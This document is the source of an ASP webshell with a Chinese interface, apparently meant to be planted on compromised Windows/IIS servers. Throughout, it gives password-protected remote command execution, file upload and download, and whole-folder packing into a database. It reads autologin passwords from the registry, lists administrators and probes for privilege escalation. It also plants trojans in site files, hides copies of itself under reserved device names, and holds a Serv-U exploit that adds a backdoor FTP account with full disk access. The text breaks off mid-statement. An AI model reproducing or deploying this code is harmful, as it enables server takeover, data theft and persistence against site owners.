"&mName&" - "&ServerIP&"

<% UserPass="pangni" mName="20160506" SiteURL="http://www.baidu.com" Copyright="google" AD="update" response.write ""+vbCrLf+""+vbCrLf+"" Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next sub ShowErr() If Err Then RRS"

" & Err.Description & "
" Err.Clear:Response.Flush End If end sub Sub RRS(str) response.write(str) End Sub Function RePath(S) RePath=Replace(S,"\","\\") End Function Function RRePath(S) RRePath=Replace(S,"\\","\") End Function URL=Request.ServerVariables("URL") ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) ServerIP=Request.ServerVariables("LOCAL_ADDR") Action=Request("Action") RootPath=Server.MapPath(".") WWWRoot=Server.MapPath("/") CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject" set fso=server.CreateObject(CONST_FSO) set fsoX=server.CreateObject(CONST_FSO) serveru=request.servervariables("http_host")&url serverp=userpass FolderPath=Request("FolderPath") FName=Request("FName") BackUrl="

返回" RRS"" RRS""&mName&" - "&ServerIP&" " RRS"" RRS"" rrs "" Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "文件操作组件":ObT(1,0) = "wscript.shell":ObT(1,2) = "命令行执行组件,显示'×'时用执行Cmd二此功能执行":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS 建库组件":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS 压缩组件":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "数据流上传辅助组件":ObT(5,0) = "Adodb.connection":ObT(5,2) = "数据库连接组件":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "数据流上传组件":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp 文件上传组件":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "刘云峰文件上传组件":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload 文件上传组件":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail 邮件收发组件":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "虚拟SMTP 发信组件":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail 发信组件":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "数据传输组件" ObT(14,0) = "ws"&"cript.shell.1": OBt(14,2) = "no wsh,use it":OBT(15,0) = "WS"&"CRIPT.NETWORK": OBt(15,2) = "show info,can token":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation 操作，无FSO时操作文件以及执行命令":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation 的别名，无FSO时操作文件以及执行命令":OBT(18,0) = "Shell.Users":OBt(18,2) = "删除了net.exe net1.exe的情况下添加用户的组件" For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" √":Else:IsObj=" ×":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next If FolderPath<>"" then Session("FolderPath")=RRePath(FolderPath) End If If Session("FolderPath")="" Then FolderPath=RootPath Session("FolderPath")=FolderPath End if Function MainForm() RRS"" RRS"" RRS"" RRS"

" RRS"" RRS"" RRS"『→>Program』『→>AllUsers』『→>程序』『→>启动』『→>pcAnywhere』『→>serv-u』『→>RealServer』『→PHP』『→>config』『→>data』『Temp』『RECYCLER』『常写』『7i24』『MySQL』

地址栏：	" RRS"" RRS"	" RRS"
" RRS"

" RRS"

" RRS"" RRS"

" End Function Function MainMenu() RRS"" RRS"" RRS"" If ObT(0,1)=" ×" Then RRS"" Else RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" RRS"" End If RRS"" RRS"

"&mName&"

" RRS"

无权限

≡≡≡≡≡≡≡≡≡≡

+≤list driver≥

" Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing RRS"

〖web_root〗

〖my_path〗

≡≡≡扫描工具≡≡≡

〖CMD命令〗

≡≡≡≡≡≡≡≡≡≡

↓　【乱七八糟】　↓

+≤数据库操作≥

" RRS" 连接数据库
" RRS" 建立MDB文件
" RRS" 压缩MDB文件

+≤挂清马操作≥

" RRS" ->查找文件木马
" RRS" ->批量GM(超强版)
" RRS" ->批量QM(超强版)
" RRS" ->批量替换(超强版)
" RRS" ->批量GM(普通版)

〖文件夹打包〗

〖注册表数据〗

≡≡≡≡≡≡≡≡≡≡

->退出登录

"&Copyright&"

" RRS"" End Function function Cmdx() RRS" " RRS"

 "
On Error Resume Next
if request("cmdx")="cmd.exe" then
 oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall 
end if 
oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall 
RRS"

" end function Sub PageAddToMdb() Dim theAct, thePath theAct = Request("theAct") thePath = Request("thePath") Server.ScriptTimeOut = 5000 If theAct = "addToMdb" Then addToMdb(thePath) RRS "操作完成!" Response.End End If If theAct = "releaseFromMdb" Then unPack(thePath) RRS"操作完成!" Response.End End If RRS "文件夹打包:
" RRS "" RRS "

文件包解开(需FSO支持):
" RRS "" RRS "

" End Sub Sub addToMdb(thePath) On Error Resume Next Dim rs, conn, stream, connStr, adoCatalog Set rs = Server.CreateObject("ADODB.RecordSet") Set stream = Server.CreateObject("ADODB.Stream") Set conn = Server.CreateObject("ADODB.Connection") Set adoCatalog = Server.CreateObject("ADOX.Catalog") connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HYTop.mdb") adoCatalog.Create connStr conn.Open connStr conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)") stream.Open stream.Type = 1 rs.Open "FileData", conn, 3, 3 If Request("theMethod") = "fso" Then fsoTreeForMdb thePath, rs, stream Else saTreeForMdb thePath, rs, stream End If rs.Close Conn.Close stream.Close Set rs = Nothing Set conn = Nothing Set stream = Nothing Set adoCatalog = Nothing End Sub Function fsoTreeForMdb(thePath, rs, stream) Dim item, theFolder, folders, files, sysFileList sysFileList = "$HYTop.mdb$HYTop.ldb$" If fsoX.FolderExists(thePath) = False Then showErr(thePath & " 目录不存在或者不允许访问!") End If Set theFolder = fsoX.GetFolder(thePath) Set files = theFolder.Files Set folders = theFolder.SubFolders For Each item In folders fsoTreeForMdb item.Path, rs, stream Next For Each item In files If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If Next Set files = Nothing Set folders = Nothing Set theFolder = Nothing End Function Sub unPack(thePath) On Error Resume Next Server.ScriptTimeOut = 5000 Dim rs, ws, str, conn, stream, connStr, theFolder str = Server.MapPath(".") & "\" Set rs = CreateObject("ADODB.RecordSet") Set stream = CreateObject("ADODB.Stream") Set conn = CreateObject("ADODB.Connection") connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";" conn.Open connStr rs.Open "FileData", conn, 1, 1 stream.Open stream.Type = 1 Do Until rs.Eof theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\")) If fsoX.FolderExists(str & theFolder) = False Then createFolder(str & theFolder) End If stream.SetEos() stream.Write rs("fileContent") stream.SaveToFile str & rs("thePath"), 2 rs.MoveNext Loop rs.Close conn.Close stream.Close Set ws = Nothing Set rs = Nothing Set stream = Nothing Set conn = Nothing End Sub Sub createFolder(thePath) Dim i i = Instr(thePath, "\") Do While i > 0 If fsoX.FolderExists(Left(thePath, i)) = False Then fsoX.CreateFolder(Left(thePath, i - 1)) End If If InStr(Mid(thePath, i + 1), "\") Then i = i + Instr(Mid(thePath, i + 1), "\") Else i = 0 End If Loop End Sub Sub saTreeForMdb(thePath, rs, stream) Dim item, theFolder, sysFileList sysFileList = "$HYTop.mdb$HYTop.ldb$" Set theFolder = saX.NameSpace(thePath) For Each item In theFolder.Items If item.IsFolder = True Then saTreeForMdb item.Path, rs, stream Else If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If End If Next Set theFolder = Nothing End Sub Function Course() SI="
" SI=SI&"" on error resume next for each obj in getObject("WinNT://.") err.clear if OBJ.StartType="" then SI=SI&"" SI=SI&"" SI0="" end if if OBJ.StartType=2 then lx="自动" if OBJ.StartType=3 then lx="手动" if OBJ.StartType=4 then lx="禁用" if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then SI1=SI1&"" else SI2=SI2&"" end if next RRS SI&SI0&SI1&SI2&"

系统用户与服务
" SI=SI&obj.Name SI=SI&"	" SI=SI&"系统用户(组)" SI=SI&"

"&obj.Name&"	"&obj.DisplayName&"
[启动类型:"&lx&"] "&obj.path&"
"&obj.Name&"	"&obj.DisplayName&"
[启动类型:"&lx&"] "&obj.path&"

" End Function Function adminab() Response.Expires=0 on error resume next '查找Administrators组帐号 Set tN=server.createObject("Wscript.Network") Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group") For Each admin in objGroup.Members Response.write admin.Name&"
" Next if err then Response.write "no way:Wscript.Network" end if End Function sub hiddenshell fpath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME")) set fso=server.createobject(CONST_FSO) pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9" rndpex=split(pex,"|")(rndnumber(0,17)) session("seljw")="" filepath1=server.mappath(".") filename1=right(fpath,len(fpath)-instrrev(fpath,"\")) url=request.servervariables("url") url=left(url,instrrev(url,"/"))&rndpex&"."&filename1 fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1 set fso=nothing RRS "" end sub Sub Message(state,msg,flag) RRS"

" RRS state RRS"

"&msg RRS"

" If flag=0 Then RRS" " Else End if RRS"

" End Sub Function Red(str) Red = "" & str & "" End Function Function RndNumber(Min,Max) Randomize RndNumber=Int((Max - Min + 1) * Rnd() + Min) End Function Sub CustomScanDriveForm() 'Response.Buffer = TruE if Request("Paths") ="" then Paths_str="c:\windows\"&chr(13)&chr(10)&"c:\Documents and Settings\"&chr(13)&chr(10)&"c:\Program Files\"&chr(13)&chr(10)&"c:\php\"&chr(13)&chr(10)&"d:\Program Files\"&chr(13)&chr(10)&"e:\Program Files\"&chr(13)&chr(10)&"C:\recycler\"&chr(13)&chr(10)&"d:\recycler\"&chr(13)&chr(10)&"e:\recycler\"&chr(13)&chr(10)&"f:\recycler\"&chr(13)&chr(10)&"C:\wmpub\"&chr(13)&chr(10)&"d:\freehostmain\"&chr(13)&chr(10)&"C:\360rec"&chr(13)&chr(10)&"C:\cache"&chr(13)&chr(10)&"C:\JPEGCapture"&chr(13)&chr(10)&"C:\windows\hchiblis.ibl"&chr(13)&chr(10)&"c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv"&chr(13)&chr(10)&"C:\7i24.com\iissafe\log\"&chr(13)&chr(10)&"C:\Inetpub"&chr(13)&chr(10)&"c:\7i24.com\Serverdoctor\log\"&chr(13)&chr(10)&"D:\iislog\"&chr(13)&chr(10)&"C:\Program Files\iiszj.com\log\"&chr(13)&chr(10)&"C:\7i24.com\LinkGate\log\"&chr(13)&chr(10)&"c:\Program Files\360\360Safe\deepscan\Section\mutex.db"&chr(13)&chr(10)&"c:\Program Files\Helicon\ISAPI_Rewrite3\error.log"&chr(13)&chr(10)&"c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log"&chr(13)&chr(10)&"c:\Program Files\Common Files\Symantec Shared\Persist.bak"&chr(13)&chr(10)&"C:\Program Files\Thunder Network\Thunder7\"&chr(13)&chr(10)&"c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf"&chr(13)&chr(10)&"C:\Program Files\FlashFXP\"&chr(13)&chr(10)&"D:\Program Files\Zend\"&chr(13)&chr(10)&"c:\windows\temp\Cookies" if Session("paths")<>"" then Paths_str=Session("paths") RRS "" else CheckFile = (Request("CheckFile")="on") CheckNextDir = (Request("CheckNextDir")="on") ShowNoWriteDir = (Request("ShowNoWrite")="on") NoCheckTemp = (Request("NoCheckTemp")="on") RRS "检测可能需要一定的时间请稍等......
" response.Flush Session("paths") = Request("Paths") PathsSplit=Split(Request("Paths"),chr(13)&chr(10)) For i=LBound(PathsSplit) To UBound(PathsSplit) if instr(PathsSplit(i),":")>0 then ShowDirWrite_Dir_File Trim(PathsSplit(i)),CheckFile,CheckNextDir End If Next RRS "[扫描完成]
" RRS "" end if end sub function GetFullPath(path) GetFullPath = path if Right(path,1) <> "\" then GetFullPath = path&"\" end function Function Deltextfile(filepath) On Error Resume Next Set objFSO = CreateObject(CONST_FSO) if objFSO.FileExists(filepath) then objFSO.DeleteFile(filepath) end if Set objFSO = nothing Deltextfile = Err.Number End Function Function CheckDirIsOKWrite(DirStr) On Error Resume Next Set FSO = Server.CreateObject(CONST_FSO) filepath = GetFullPath(DirStr)&fso.GettempName FSO.CreateTextFile(filepath) CheckDirIsOKWrite = Err.Number if ShowNoWriteDir and (CheckDirIsOKWrite =70) then RRS "[目录]"&DirStr&" ["&Err.Description&"]
" end if set fout =Nothing set FSO = Nothing Deltextfile(filepath) if CheckDirIsOKWrite=0 and Deltextfile(filepath)=70 then CheckDirIsOKWrite =1 end Function function CheckFileWrite(filepath) On Error Resume Next Set FSO = Server.CreateObject(CONST_FSO) set getAtt=FSO.GetFile(filepath) getAtt.Attributes = getAtt.Attributes CheckFileWrite = Err.Number set FSO = Nothing set getAtt = Nothing end function function ShowDirWrite_Dir_File(Path,CheckFile,CheckNextDir) On Error Resume Next Set FSO = Server.CreateObject(CONST_FSO) B = FSO.FolderExists(Path) set FSO=nothing IS_TEMP_DIR =(instr(UCase(Path),"WINDOWS\TEMP")>0) and NoCheckTemp if B=false then Re = CheckFileWrite(Path) if Re =0 then RRS "[文件]"&Path&"
" b =true exit function else RRS "[文件]"&Path&" ["&Err.Description&"]
" exit function end if end if Path = GetFullPath(Path) re = CheckDirIsOKWrite(Path) if (re =0) or (re=1) then RRS "[目录]"& Path&"
" end if Set FSO = Server.CreateObject(CONST_FSO) set f = fso.getfolder(Path) if (CheckFile=True) and (IS_TEMP_DIR=false) then b=false for each file in f.Files Re = CheckFileWrite(Path&file.name) if Re =0 then RRS "[文件]"& Path&file.name&"
" b =true else if ShowNoWriteDir then j "[文件]"&Path&file.name&" ["&Err.Description&"]
" end if next if b then response.Flush end if for each file in f.SubFolders if CheckNextDir=false then re = CheckDirIsOKWrite(Path&file.name) if (re =0) or (re=1) then RRS "[目录]"& Path&file.name&"
" end if end if if (CheckNextDir=True) and (IS_TEMP_DIR=false) then ShowDirWrite_Dir_File Path&file.name,CheckFile,CheckNextDir end if next Set FSO = Nothing set f = Nothing end function c=userpass function goback() set Ofso = Server.CreateObject(CONST_FSO) set ofolder = Ofso.Getfolder(Session("FolderPath")) if not ofolder.IsRootFolder then RRS "" else RRS "已经是磁盘根目录了!

" end if set Ofso=nothing set ofolder=nothing end function Function fuck() On Error Resume Next dim wsh set wsh=createobject("Wscript.Shell") SoftPath=Wsh.Environment.item("Path") Pathinfo=lcase(SoftPath) Response.Write"

系统软件支持:
" Response.Write"-----------------------------
" if Instr(Pathinfo,"perl") Then Response.Write "

Perl脚本:支持
" if instr(Pathinfo,"java") Then Response.Write "

Java脚本:支持
" if instr(Pathinfo,"microsoft sql server") Then Response.Write "

MSSQL数据库服务:支持
" if instr(Pathinfo,"mysql") Then Response.Write "

MySQL数据库服务:支持
" if instr(Pathinfo,"oracle") Then Response.Write "

Oracle数据库服务:支持
" if instr(Pathinfo,"cfusionmx7") Then Response.Write "

CFM服务器:支持
" if instr(Pathinfo,"pcanywhere") Then Response.Write "

赛门铁克PcAnywhere控制:支持
" if instr(Pathinfo,"Kill") Then Response.Write "

Kill杀毒软件:支持
" if instr(Pathinfo,"kav") Then Response.Write "

金山系列杀毒软件:支持
" if instr(Pathinfo,"antivirus") Then Response.Write "

赛门铁克杀毒软件:支持
" if instr(Pathinfo,"rising") Then Response.Write "

瑞星系列杀毒软件:支持
" paths=split(SoftPath,";") Response.Write "------------------------------------
" Response.Write "系统当前路径变量:
" For i=Lbound(paths) to Ubound(paths) Response.Write "

"&paths(i)&"
" next end Function Function hook() on error resume next dim wsh set wsh=createobject("Wscript.Shell") Response.Write "[网络探测]

" EnableTCPIPKey="HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters" isEnable=Wsh.Regread(EnableTcpipKey) If isEnable=0 or isEnable="" Then Notcpipfilter=1 End If ApdKey="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind" Apds=Wsh.RegRead(ApdKey) If IsArray(Apds) Then For i=LBound(Apds) To UBound(Apds)-1 ApdB=Replace(Apds(i),"\Device\","") Response.Write "网卡"&i&"的序列为:"&ApdB&"
" Path="HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\" 'IP地址探测 IPKey=Path&ApdB&"\IPAddress" IPaddr=Wsh.Regread(IPKey) If IPaddr(0)<>"" Then For j=Lbound(IPAddr) to Ubound(IPAddr) Response.Write "

IP地址"&j&"为:"&IPAddr(j)&"
" Next Else Response.Write "

IP地址无法读取或没有设置
" End if '网关设置探测 GateWayKey=Path&ApdB&"\DefaultGateway" GateWay=Wsh.Regread(GateWayKey) If isarray(GateWay) Then For j=Lbound(Gateway) to Ubound(Gateway) Response.Write "

网关"&j&"为:"&Gateway(j)&"
" Next Else Response.Write "

默认网关无法读取或没有设置
" End if 'DNS设置探测 DNSKey=Path&ApdB&"\NameServer" DNSstr=Wsh.RegRead(DNSKey) If DNSstr<>"" Then Response.Write "

网卡DNS为:"&DNSstr&"
" Else Response.Write "

默认DNS无法读取或没有设置
" End If 'TCP/IP筛选探测 if Notcpipfilter=1 Then Response.Write "

没有Tcp/IP筛选
" else ETK="\TCPAllowedPorts" EUK="\UDPAllowedPorts" FullTCP=Path&ApdB&ETK FullUDP=path&ApdB&EUK tcpallow=Wsh.RegRead(FullTCP) If tcpallow(0)="" or tcpallow(0)=0 Then Response.Write "

允许的TCP端口为:全部
" Else Response.Write "

允许的TCP端口为:" For j = LBound(tcpallow) To UBound(tcpallow) Response.Write tcpallow(j)&"," Next Response.Write "
" End if udpallow=Wsh.RegRead(FullUDP) If udpallow(0)="" or udpallow(0)=0 Then Response.Write "

允许的UDP端口为:全部
" Else Response.Write "

允许的UDP端口为:" for j = LBound(udpallow) To UBound(udpallow) Response.Write UDPallow(j)&"," next Response.Write "
" End if End if Response.Write "------------------------------------------------
" Next end if Response.Write "

[系统设置探测]

" pcnamekey="HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName" pcname=wsh.RegRead(pcnamekey) if pcname="" Then pcname="无法读取主机名.
" Response.Write "

当前主机名为:"&pcname&"
" AdminNameKey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName" AdminName=wsh.RegRead(AdminNameKey) if adminname="" Then AdminName="Administrator" Response.Write "

默认管理员用户名为:"&AdminName&"
" isAutologin="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon" Autologin=Wsh.RegRead(isAutologin) if Autologin=0 or Autologin="" Then Response.Write "

用户自动登入:未启用
" Else Response.Write "

用户自动登入:启用
" Admin=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName") Passwd=Wsh.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultPassword") Response.Write "

用户名:"&Admin&"
" Response.Write "

密码:"&Passwd&"
" End if displogin=wsh.regRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DontDisplayLastUserName") If displogin="" or displogin=0 Then disply="是" else disply="否" Response.Write "

是否显示上次登入用户:"&disply&"
" NTMLkey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\NTML" ntml=Wsh.RegRead(NTMLkey) if ntml="" Then Ntml=1 Response.Write "

Telnet Ntml设置为:"&ntml&"
" hk="HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count" kk=wsh.RegRead(hk) Response.Write"

当前活动网卡为:"&kk&"
" Response.Write "------------------------------------

" end Function Sub unPack(thePath) On Error Resume Next Server.ScriptTimeOut = 5000 Dim rs, ws, str, conn, stream, connStr, theFolder str = Server.MapPath(".") & "\" Set rs = CreateObject("ADODB.RecordSet") Set stream = CreateObject("ADODB.Stream") Set conn = CreateObject("ADODB.Connection") connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";" conn.Open connStr rs.Open "FileData", conn, 1, 1 stream.Open stream.Type = 1 Do Until rs.Eof theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\")) If fsoX.FolderExists(str & theFolder) = False Then createFolder(str & theFolder) End If stream.SetEos() stream.Write rs("fileContent") stream.SaveToFile str & rs("thePath"), 2 rs.MoveNext Loop rs.Close conn.Close stream.Close Set ws = Nothing Set rs = Nothing Set stream = Nothing Set conn = Nothing End Sub Sub createFolder(thePath) Dim i i = Instr(thePath, "\") Do While i > 0 If fsoX.FolderExists(Left(thePath, i)) = False Then fsoX.CreateFolder(Left(thePath, i - 1)) End If If InStr(Mid(thePath, i + 1), "\") Then i = i + Instr(Mid(thePath, i + 1), "\") Else i = 0 End If Loop End Sub Sub saTreeForMdb(thePath, rs, stream) Dim item, theFolder, sysFileList sysFileList = "$HYTop.mdb$HYTop.ldb$" Set theFolder = saX.NameSpace(thePath) For Each item In theFolder.Items If item.IsFolder = True Then saTreeForMdb item.Path, rs, stream Else If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then rs.AddNew rs("thePath") = Mid(item.Path, 4) stream.LoadFromFile(item.Path) rs("fileContent") = stream.Read() rs.Update End If End If Next Set theFolder = Nothing End Sub Function gody() Response.write "[服务器弱点探测]

" Set objComputer = GetObject("WinNT://.") Set sa = Server.CreateObject("Shell.Application") objComputer.Filter = Array("Service") 'On Error Resume Next For Each objService In objComputer if objService.Name="Serv-U" Then if objService.ServiceAccountName="LocalSystem" Then Response.Write "

服务器中有Serv-U安装,且以LocalSystem权限启动,可以考虑提权
" End if End if if lcase(objService.Name)="apache" Then if objService.ServiceAccountName="LocalSystem" Then If instr(Request.ServerVariables("SERVER_SOFTWARE"),"Apache") Then Response.Write "

当前WEB服务器为Apache.可以直接提权
" Else Response.Write "

服务器中有Apache服务存在,启动权限为LocalSystem,可以考虑PHP木马
" End if end if End if if instr(lcase(objService.Name),"tomcat") Then if objService.ServiceAccountName="LocalSystem" Then Response.Write "

服务器中有Tomcat,且以LocalSystem权限启动,可以考虑使用Jsp木马提权
" End if End if if instr(lcase(objService.Name),"winmail") Then if objService.ServiceAccountName="LocalSystem" Then Response.Write "

服务器中有Magic Winmail,且以LocalSystem权限启动,可以查找WebMail目录,并且写入PHP木马
" End if End if Next Set fso=Server.Createobject("Scripting.FileSystemObject") Sysdrive=left(Fso.GetspecialFolder(2),2) servername=wsh.RegRead("HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName") If fso.FileExists(sysdriver&"\Documents And Settings\All Users\Application Data\Symantec\"&servername&".cif") Then Response.Write "

服务器组件信息
服务器名		"&request.serverVariables("SERVER_NAME")&"
服务器IP		" SI=SI&"
服务器时间		"&now&"
服务器CPU数量		"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"
服务器操作系统		"&Request.ServerVariables("OS")&"
WEB服务器版本		"&Request.ServerVariables("SERVER_SOFTWARE")&"
"&ObT(i,0)&"	"&ObT(i,1)&"	"&ObT(i,2)&"

" For i=0 To 18 SI=SI&"" Next RRS SI End Function Function DownFile(Path) Response.Clear Set OSM = CreateObject(ObT(6,0)) OSM.Open OSM.Type = 1 OSM.LoadFromFile Path sz=InstrRev(path,"\")+1 Response.AddHeader "Content-Disposition", "attachment; filename=" & Mid(path,sz) Response.AddHeader "Content-Length", OSM.Size Response.Charset = "UTF-8" Response.ContentType = "application/octet-stream" Response.BinaryWrite OSM.Read Response.Flush OSM.Close Set OSM = Nothing End Function fUnCtIOn htMLeNcODe(s) if NoT iSnull(s) THen S = ReplACE(S, ">", ">") s = rePlaCE(s, "<", "<") s = rEplAce(S, CHR(39), "'") S = RepLAcE(S, chR(34), """) S = REPLACE(s, chr(20), " ") hTmLencoDE = S enD iF eND fUNCtION Function UpFile() If Request("Action2")="Post" Then Set U=new UPC : Set F=U.UA("LocalFile") UName=U.form("ToPath") If UName="" Or F.FileSize=0 then SI="
请输入上传的完全路径后选择一个文件上传!" Else F.SaveAs UName If Err.number=0 Then SI="

文件"&UName&"上传成功！" End if End If Set F=nothing:Set U=nothing SI=SI&BackUrl RRS SI ShowErr() Response.End End If SI="

服务器组件信息
服务器名		"&request.serverVariables("SERVER_NAME")&"
服务器IP
服务器时间		"&now&"
服务器CPU数量		"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"
服务器操作系统		"&Request.ServerVariables("OS")&"
WEB服务器版本		"&Request.ServerVariables("SERVER_SOFTWARE")&"
"&ObT(i,0)&"	"&ObT(i,1)&"	"&ObT(i,2)&"

" SI=SI&"" SI=SI&"

" SI=SI&"上传路径：" SI=SI&" " SI=SI&" " SI=SI&"

" RRS SI End Function Function ws1() checked=" checked" If Request("SP")<>"" Then Session("ShellPath") = Request("SP") ShellPath=Session("ShellPath") if ShellPath="" Then ShellPath = "cmd.exe" if Request("wscript")<>"yes" then checked="" If Request("cmd")<>"" Then DefCmd = Request("cmd") SI="" RRS SI End Function function ws2() on error resume next if request("sp")<>"" then session("shellpath") = request("sp") shellpath=session("shellpath") if shellpath="" then shellpath = "cmd.exe" if request("cmd")<>"" then session("defcmd") = request("cmd") defcmd=session("defcmd") if defcmd="" then defcmd=" /c set" if request("rwpath")<>"" then session("rwpath") = request("rwpath") rwpath=session("rwpath") if rwpath="" then rwpath=server.mappath(".") si="" case "wscript.shell","wscript.shell.1" on error resume next set ws=server.createobject(request("cmdtype")) call ws.run (shellpath& defcmd & " > " & sztempfile, 0, true) set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0) aaa=server.htmlencode(ofilelcx.readall) ofilelcx.close call fso.deletefile(sztempfile, true) si=si&"" si=si&aaa si=si&chr(13)&"" case "shell.application","shell.application.1" set seshell=server.createobject(request("cmdtype")) seshell.ShellExecute shellpath, defcmd & " > " & sztempfile,"","open",0 si=si&"

探测服务器是否支持其他脚本

(删除测试文件!)

" End function function apjdel():set fso=Server.CreateObject(CONST_FSO):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):RRS"删除完毕!":End function Select Case Action Case "MainMenu":MainMenu() Case "EditPower" Call EditPower(request("PowerPath")) Case "SavePower" Call SavePower(request("PowerPath"),request("SaveType")) Case "getTerminalInfo":getTerminalInfo() Case "PageAddToMdb":PageAddToMdb() ' case "ScanPort":ScanPort() Case "Servu" SUaction=request("SUaction") if not isnumeric(SUaction) then response.end user = trim(request("u")) pass = trim(request("p")) port = trim(request("port")) cmd = trim(request("c")) f=trim(request("f")) if f="" then f=gpath() else f=left(f,2) end if ftpport = 65500 timeout=3 loginuser = "User " & user & vbCrLf loginpass = "Pass " & pass & vbCrLf deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf mt = "SITE MAINTENANCE" & vbCrLf newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _ "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _ "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _ "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _ "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _ "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _ "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf quit = "QUIT" & vbCrLf newuser=replace(newuser,"c:",f) select case SUaction case 1 set a=Server.CreateObject("Microsoft.XMLHTTP") a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", "" a.send loginuser & 